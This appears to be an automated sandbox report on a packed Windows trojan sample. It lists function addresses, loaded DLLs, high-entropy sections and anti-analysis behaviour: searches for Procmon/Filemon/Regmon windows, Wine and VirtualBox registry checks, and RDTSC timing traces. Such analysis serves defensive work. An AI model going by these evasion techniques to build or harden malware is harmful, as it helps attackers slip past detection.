      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00140AD80_2_00140AD8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00171AC30_2_00171AC3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B3ACF0_2_001B3ACF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F9AD00_2_000F9AD0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00170AC80_2_00170AC8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019EAF30_2_0019EAF3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BFAF50_2_001BFAF5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FB100_2_0011FB10
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019AB180_2_0019AB18
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A1B1D0_2_001A1B1D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F8B120_2_000F8B12
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C8B030_2_001C8B03
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A6B3B0_2_001A6B3B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00174B3D0_2_00174B3D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00151B3E0_2_00151B3E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000EAB400_2_000EAB40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B1B7D0_2_001B1B7D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016BB660_2_0016BB66
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00181B6A0_2_00181B6A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016EB6A0_2_0016EB6A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00199B650_2_00199B65
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FEB800_2_000FEB80
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019FB880_2_0019FB88
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00163B820_2_00163B82
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016CBB70_2_0016CBB7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00165BB10_2_00165BB1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00167BBC0_2_00167BBC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016ABBD0_2_0016ABBD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E4BA00_2_000E4BA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00179BD80_2_00179BD8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018BBC90_2_0018BBC9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00169BF90_2_00169BF9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00148BED0_2_00148BED
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00113C100_2_00113C10
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C7C150_2_001C7C15
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00178C010_2_00178C01
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018CC000_2_0018CC00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00153C0B0_2_00153C0B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00180C320_2_00180C32
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00155C230_2_00155C23
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00158C500_2_00158C50
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00197C530_2_00197C53
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015DC710_2_0015DC71
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001ADC620_2_001ADC62
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00166C690_2_00166C69
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00164C9A0_2_00164C9A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A9C8E0_2_001A9C8E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001ABCBA0_2_001ABCBA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C4CB10_2_001C4CB1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F4CA00_2_000F4CA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00160CAF0_2_00160CAF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016DCC70_2_0016DCC7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00111CF00_2_00111CF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017FCF60_2_0017FCF6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B2CFF0_2_001B2CFF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002A7CC10_2_002A7CC1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B9CEB0_2_001B9CEB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016FCED0_2_0016FCED
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00101D000_2_00101D00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017CD020_2_0017CD02
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00119D300_2_00119D30
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F1D2B0_2_000F1D2B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00182D3E0_2_00182D3E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00120D200_2_00120D20
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019AD2B0_2_0019AD2B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B5D2C0_2_001B5D2C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019FD220_2_0019FD22
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00106D2E0_2_00106D2E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014ED5D0_2_0014ED5D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00165D5F0_2_00165D5F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010CD5E0_2_0010CD5E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C6D530_2_001C6D53
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00193D4A0_2_00193D4A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B0D4D0_2_001B0D4D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010CD4C0_2_0010CD4C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FD700_2_0011FD70
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00156D7A0_2_00156D7A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014ADB40_2_0014ADB4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00168DB60_2_00168DB6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BBDB40_2_001BBDB4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00143DA50_2_00143DA5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A4DAB0_2_001A4DAB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00117DA90_2_00117DA9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002ACDEF0_2_002ACDEF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00157DDD0_2_00157DDD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00173DF70_2_00173DF7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011CDF00_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A8E1B0_2_001A8E1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015CE160_2_0015CE16
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00189E1B0_2_00189E1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00178E180_2_00178E18
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FE000_2_0011FE00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00150E0B0_2_00150E0B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015EE2F0_2_0015EE2F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B3E270_2_001B3E27
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00159E5D0_2_00159E5D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000ECE450_2_000ECE45
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C2E4F0_2_001C2E4F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00175E400_2_00175E40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00140E4A0_2_00140E4A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010FE740_2_0010FE74
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00190E7F0_2_00190E7F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00160E670_2_00160E67
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010EE630_2_0010EE63
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00100E6C0_2_00100E6C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00102E6D0_2_00102E6D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019EE9A0_2_0019EE9A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A0E9E0_2_001A0E9E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00146EB10_2_00146EB1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014BEBC0_2_0014BEBC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BFEAB0_2_001BFEAB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00118EA00_2_00118EA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A7EA30_2_001A7EA3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E2EB00_2_000E2EB0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FAEB00_2_000FAEB0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B0EC90_2_001B0EC9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BDEC80_2_001BDEC8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B5EC50_2_001B5EC5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014CEF00_2_0014CEF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018DEFD0_2_0018DEFD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Code function: String function: 000F4C90 appears 77 times
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Code function: String function: 000E7F60 appears 40 times
      Source: PH1D3KHmOD.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: PH1D3KHmOD.exe | Static PE information: Section: ZLIB complexity 0.9992659824346405
      Source: PH1D3KHmOD.exe | Static PE information: Section: rlrmwtje ZLIB complexity 0.9950118921775899
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Code function: 0_2_00112070 CoCreateInstance
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: PH1D3KHmOD.exe | Virustotal: Detection: 56%
      Source: PH1D3KHmOD.exe | ReversingLabs: Detection: 60%
      Source: PH1D3KHmOD.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | File read: C:\Users\user\Desktop\PH1D3KHmOD.exe
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: webio.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Section loaded: ondemandconnroutehelper.dll
      Source: PH1D3KHmOD.exe | Static file information: File size 1867776 > 1048576
      Source: PH1D3KHmOD.exe | Static PE information: Raw size of rlrmwtje is bigger than: 0x100000 < 0x19de00

      Data Obfuscation

      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Unpacked PE file: 0.2.PH1D3KHmOD.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rlrmwtje:EW;txntjrfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rlrmwtje:EW;txntjrfm:EW;.taggant:EW;
      Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
      Source: PH1D3KHmOD.exe | Static PE information: real checksum: 0x1d6a97 should be: 0x1d7b7d
      Source: PH1D3KHmOD.exe | Static PE information: section name:
      Source: PH1D3KHmOD.exe | Static PE information: section name: .idata
      Source: PH1D3KHmOD.exe | Static PE information: section name:
      Source: PH1D3KHmOD.exe | Static PE information: section name: rlrmwtje
      Source: PH1D3KHmOD.exe | Static PE information: section name: txntjrfm
      Source: PH1D3KHmOD.exe | Static PE information: section name: .taggant
      Source: PH1D3KHmOD.exe | Static PE information: section name: entropy: 7.968015840636174
      Source: PH1D3KHmOD.exe | Static PE information: section name: rlrmwtje entropy: 7.954785719367017

      Boot Survival

      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: RegmonClass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | Window searched: window name: Regmonclass

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | File opened: HKEY_CURRENT_USER\Software\Wine
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA08 second address: 2DAA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA0C second address: 2DAA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F8CACB12CC3h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA31 second address: 2DAA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA35 second address: 2DAA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA3B second address: 2DAA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D98F7 second address: 2D9915 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACB12CBCh 0x00000008 jg 00007F8CACB12CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8CACB12CBAh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D9915 second address: 2D9919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D9919 second address: 2D9922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DCF93 second address: 2DCF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2AE3D8 second address: 2AE3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1009 second address: 2E1020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8CACC719F1h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16D0 second address: 2E16E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16E7 second address: 2E16EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16EB second address: 2E1705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1862 second address: 2E1880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1880 second address: 2E188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E188A second address: 2E188E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E188E second address: 2E18A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F8CACB12CDDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EA1 second address: 2E4EC4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACC719E8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F8CACC719EDh 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F8CACC719E6h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EC4 second address: 2E4EED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F8CACB12CB6h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EED second address: 2E4F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F8CACC719E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4F06 second address: 2E4F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jns 00007F8CACB12CD2h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F8CACB12CB8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b or esi, dword ptr [ebp+122D2686h] 0x00000031 push 9C2F29B3h 0x00000036 je 00007F8CACB12CC2h 0x0000003c jc 00007F8CACB12CBCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5574 second address: 2E558C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5658 second address: 2E5662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5C49 second address: 2E5C4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5E92 second address: 2E5E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5F84 second address: 2E5F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6EE7 second address: 2E6F61 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CACB12CB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jmp 00007F8CACB12CC6h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F8CACB12CB8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov si, dx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F8CACB12CB8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push esi 0x00000058 pop esi 0x00000059 pop eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D46 second address: 2E6D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D4A second address: 2E6D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
